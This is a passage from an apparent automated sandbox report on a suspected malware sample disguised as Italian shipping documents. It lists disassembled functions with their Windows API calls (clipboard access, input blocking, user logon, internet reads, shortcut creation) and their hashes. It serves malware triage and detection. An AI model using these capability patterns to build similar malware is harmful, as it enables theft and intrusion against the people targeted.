                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                        Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                        • CoInitialize.OLE32(00000000), ref: 00478442
                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                        • CoUninitialize.OLE32 ref: 0047863C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                        Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(?), ref: 0046DCE7
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                        • CloseClipboard.USER32 ref: 0046DD0D
                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                        • CloseClipboard.USER32 ref: 0046DD41
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                        • CloseClipboard.USER32 ref: 0046DD99
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                        • String ID:
                        • API String ID: 15083398-0
                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                        Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: U$\
                        • API String ID: 4104443479-100911408
                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                        Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                        • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                        Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                        • FindClose.KERNEL32(00000000), ref: 004339EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                        Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                        • String ID:
                        • API String ID: 901099227-0
                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                        Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                        Download Yara Rule
                        APIs
                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Proc
                        • String ID:
                        • API String ID: 2346855178-0
                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                        Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • BlockInput.USER32(00000001), ref: 0045A38B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                        Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                        Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                        Download Yara Rule
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                        Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                        Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID: N@
                        • API String ID: 0-1509896676
                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                        Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                        Function 004129D0 Relevance: .4, Instructions: 355COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                        Function 004125E8 Relevance: .3, Instructions: 349COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                        Function 00412216 Relevance: .3, Instructions: 332COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
